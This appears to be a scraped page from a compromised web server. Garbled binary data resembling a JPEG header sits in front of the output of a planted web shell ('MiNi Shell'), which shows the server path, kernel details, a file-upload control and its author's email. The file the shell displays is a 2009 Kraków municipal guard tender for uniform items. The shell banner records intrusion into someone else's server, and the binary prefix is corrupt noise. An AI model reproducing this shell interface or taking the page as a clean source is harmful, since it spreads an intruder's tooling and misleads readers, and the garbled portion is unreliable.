JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090827/294766-N-2009.html

<p class="kh_header"><b>Kraków: Dostawa elementów umundurowania II</b><br>
<b>Numer ogłoszenia: 294766 - 2009; data zamieszczenia: 27.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska Miasta Krakowa , ul. Dobrego Pasterza 116, 31-416 Kraków, woj. małopolskie, tel. 012 4137703, 4133734, faks 012 4138829.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elementów umundurowania II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa elementów umundurowania wykonanych wg wzoru    określonego w Rozporządzeniu Rady Ministrów z dnia 28.07.1998 r. w sprawie umundurowania  strażników gminnych i miejskich (Dz. U. z 1998 r., Nr 112 poz. 713) oraz zgodnych  ze wzorami umundurowania  używanymi przez Straż Miejską Miasta Krakowa.

   Część 1 - kurtka olimpijka                                     -  11 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.22.32.00-8
Kurtka olimpijka - materiał gabardyna o gramaturze 480 gr/m2, kolor ciemny granat, na podszewce, na ple-cach dwie fałdy, szerokie szlufki na pas, ściągacze gumowe po bokach, zapinanie na guziki kryte listwą, dwie kieszenie zamykane klapkami, na pagonach, przy kieszeniach i rękawach - małe guziki metalowe koloru zło-tego z wizerunkiem orła.
      Termin dostawy: do 29 września 2009 r.

                    -  spodnie gabardynowe                            - 146 szt.
Oznaczenie przedmiotu zamówienia wg CPV 18.23.40.00-8
Spodnie gabardynowe: krój prosty z lampasem koloru żółtego, z przodu dwie kieszenie
w karczkach biodrowych, z tyłu jedna kieszonka z wypustką na guzik, podwójne szlufki na pasek i pas głów-ny, zapięcie specjalne regulujące obwód pasa, zamek błyskawiczny,
materiał - gabardyna mundurowa 480 gr/m2, kolor - ciemny granat.	
     Termin dostawy: I tura - 56 szt. do 29 września 2009 r. 
                                  II tura - 90 szt. do 26 października 2009 r.   

   Część 2 - kurtka zimowa krótka                           -  92 szt.
Oznaczenie przedmiotu zamówienia wg CPV 18.22.32.00-8
Kurtka zimowa krótka: materiał - 100% poliester powlekany poliuretanem, gramatura 155gr/m2,  kolor ciemny granat, długość do połowy bioder, wyposażona: w  2 nakładane kieszenie wierzchnie dostępne  z gó-ry i z boku, w tym jedna na podszewce, całość zapinana na zamek błyskawiczny kryty plisą, dół kurtki i rę-kawy wykończone gumą (ściągacze), szlufki na pas główny, pagony na rzepy lub guziki,  klapę na blachę służbową, odpinany kołnierz  futrzany, odpinaną pikowaną podpinkę.
      Termin dostawy: I tura - 29 szt. do 29 września 2009 r. 
                                   II tura - 63 szt. do 26 października 2009 r.   
   Część 3 -  kurtka zimowa ?                                   -  64 szt.
Oznaczenie przedmiotu zamówienia wg CPV 18.22.32.00-8
Kurtka zimowa 3/4: ocieplona, materiał - ortalion lub inna tkanina powlekana apreturą wodoodporną, ko-lor ciemny granat, wyposażona: w 2 kieszenie wierzchnie, jedną wewnętrzną, całość zapinana na zamek błyskawiczny kryty plisą, w dolnej części po bokach gumki, ściągacz na rękawach, pagony na rzepy lub gu-ziki,  klapa na blachę służbową, od wewnątrz kurtki dopinana stójka  (kołnierz krótki).
       Termin dostawy: I tura - 12 szt. do 29 września 2009 r. 
                                    II tura - 52 szt. do 26 października 2009 r.   

   Część 4- odzież treningowa (dres) /z nadrukiem SM/-  88 kpl  
                     Oznaczenie przedmiotu zamówienia wg CPV 18.41.21.00-1
Dres - materiał 100% bawełna, gramatura 320 g/m2, kolor ciemny  granat, bluza na zamek z napisem na plecach w kolorze żółtym (Straż Miejska Kraków), spodnie z zewnętrznym rozcięciem ( 8,5 cm) na dole nogawek.
      Termin dostawy: I tura - 28 szt. do 29 września 2009 r. 
                                   II tura - 60 szt. do 26 października 2009 r.   

   Część 5 -  sweter służbowy                                     -  56 szt.
                     Oznaczenie przedmiotu zamówienia wg CPV 18.23.53.00-8
Sweter służbowy typ (SM) w serek, kolor - ciemny granat, skład: 40% wełna, 55% akryl,     5% lycry, obszycia z elanobawełny w kolorze swetra, wzmocnienia na ramionach i rękawach, na lewej piersi kieszeń z patką zapinana na rzep, pagony na rzep, rękaw  zakończony odwijanym mankietem, dół swetra wykończony  podwójnym ściągaczem.
     Termin dostawy: I tura - 29 szt. do 29 września 2009 r. 
                                  II tura - 27 szt. do 26 października 2009 r.   

  Część 6 - skarpety zimowe męskie                         -  820 par
                  Oznaczenie przedmiotu zamówienia wg CPV 18.31.70.00-4
      Skarpety męskie frotte  w kolorze: ciemny granat, materiał:  bawełna 80% + poliamid 20%  ze ściągaczem
      i płaskim  szwem.
     Termin dostawy: do 26 października 2009 r.

  Część 7 - czapka zimowa			              -   56 szt.
                        Oznaczenie przedmiotu zamówienia wg CPV 18.44.33.20-5
	Czapka zimowa z daszkiem w kolorze ciemny granat bez orła i otoku, wykonana z nylonu, ocieplona pikowaną ociepliną, nauszniki z futerkiem koloru czarnego wiązane na szczycie czapki.
     Termin dostawy: do  26 października 2009 r.
   
   Część 8 -  kalesony                                                  - 380 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.31.20.00-9
Kalesony ocieplone - materiał 100% bawełna z kutnerkiem, gram. 200 gr/m2, kolor jasnopopielaty / melanż/.
     Termin dostawy: do 26 października 2009 r.

   Część 9 -  podkoszulek zimowy                             - 392 szt.
                     Oznaczenie przedmiotu zamówienia wg CPV 18.31.84.00-5
Podkoszulek zimowy- materiał 100% bawełna z kutnerkiem, gram. 200 gr/m2 kolor jasnopopielaty (melanż).
     Termin dostawy: 26 października 2009 r.

  Część 10 -  szalik zimowy                                       -  63 szt.
                     Oznaczenie przedmiotu zamówienia wg CPV 18.42.20.00-3
Szalik zimowy koloru ciemny granat o wymiarach 100-110 cm x 26-30 cm o składzie: 70% akryl, 30% wełna.                               
      Termin dostawy: do 26 października 2009 r.

  Część 11 - buty zimowe męskie ( za kostkę)        -  65 par   
                      Oznaczenie przedmiotu zamówienia wg CPV 18.81.51.00-6
Wierzch: cholewka typu derbowego wykonana ze skór bydlęcych gładkich gr. 1,4 - 1,6; podszewka na obłoży- 
ny: tkanina ocieplana typu kożuch krótki włos; międzypodszewka typu molino; podeszwa typu LUGA koloru  czarnego; podsuwka wykonana ze styrogumu gr. 5 - 7 mm; wyściółka obuwnicza typu filc koloru czarnego;  kołnierz (tkanina skóropodobna typu skaj) z wypełnieniem pianką PU gr. 20 mm; system sznurowania: 4 uchwyty 210 + 3 uchwyty rurowe + 1 oczko (zakończenie); sznurowadła bawełniane kolor czarny dł. 1,4 - 1,6 m.
      Termin dostawy: do 26 października 2009 r.

  Część 12 - buty zimowe damskie ( za kostkę)     -  13 par   
                      Oznaczenie przedmiotu zamówienia wg CPV 18.81.51.00-6
Wierzch: cholewka typu derbowego wykonana ze skór bydlęcych gładkich gr. 1,4 - 1,6; podszewka na obłożyny: tkanina ocieplana typu kożuch krótki włos; międzypodszewka typu molino; podeszwa typu LUGA koloru  czarnego; podsuwka wykonana ze styrogumu gr. 5 - 7 mm; wyściółka obuwnicza typu filc koloru czarnego;  kołnierz (tkanina skóropodobna typu skaj) z wypełnieniem pianką PU gr. 20 mm; system sznurowania: 4 uchwyty 210 + 3 uchwyty rurowe + 1 oczko (zakończenie); sznurowadła bawełniane kolor czarny
 dł. 1,4 - 1,6 m.
      Termin dostawy: do 26 października 2009 r.
 
  Część 13 - rękawice skórzane męskie                 -  83 pary
                  Oznaczenie przedmiotu zamówienia wg CPV 18.42.40.00-7
 Rękawice skórzane  męskie(wzór mundurowy) 5 -palcowe, zimowe wykonane ze skóry rękawicznej w kolorze czarnym, ocieplane wkładem z anilany, maszynowo szyte, w nadgarstku wszyta gumka.
     Termin dostawy: do 26 października 2009 r.

   Wykonawca winien udzielić pełnej (materiały i robocizna) gwarancji na wyroby objęte  przedmiotem zamówienia na okres min. 24 miesięcy.
         
   Do oferty należy dołączyć wzory oferowanych elementów umundurowania.
   (Załączone wzory będą zwrócone po zakończeniu postępowania).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 18.22.32.00-8, 18.23.40.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie obowiązuje<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział oferenci niewykluczeni na podstawie art. 24 prawa zamówień publicznych, spełniający warunki zawarte w art. 22 ust. 1 prawa zamówień publicznych oraz warunki dodatkowe zawarte w Specyfikacji Istotnych Warunków Zamówienia.
Ocena spełniania warunków wymaganych od Wykonawcy określonych w SIWZ zostanie dokonana wg.  formuły : spełnia- nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wymagane dokumenty:
1.	Wypełniony Formularz Oferty,
2.	Specyfikacja techniczno-cenowa,
3.	Oświadczenie z art. 22 ust. 1 o spełnianiu warunków udziału w postępowaniu,
4.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji dział. gospod..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - jakość - 30</li>
<li>3 - gwarancja - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.krakow.pl/?bip_id=33&mmi=728.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Straż miejska Miasta Krakowa, 31-416 Kraków, ul Dobrego Pasterza 116 p.315.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2009 godzina 08:30, miejsce: Straż miejska Miasta Krakowa, 31-416 Kraków, ul Dobrego Pasterza 116 p.315.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com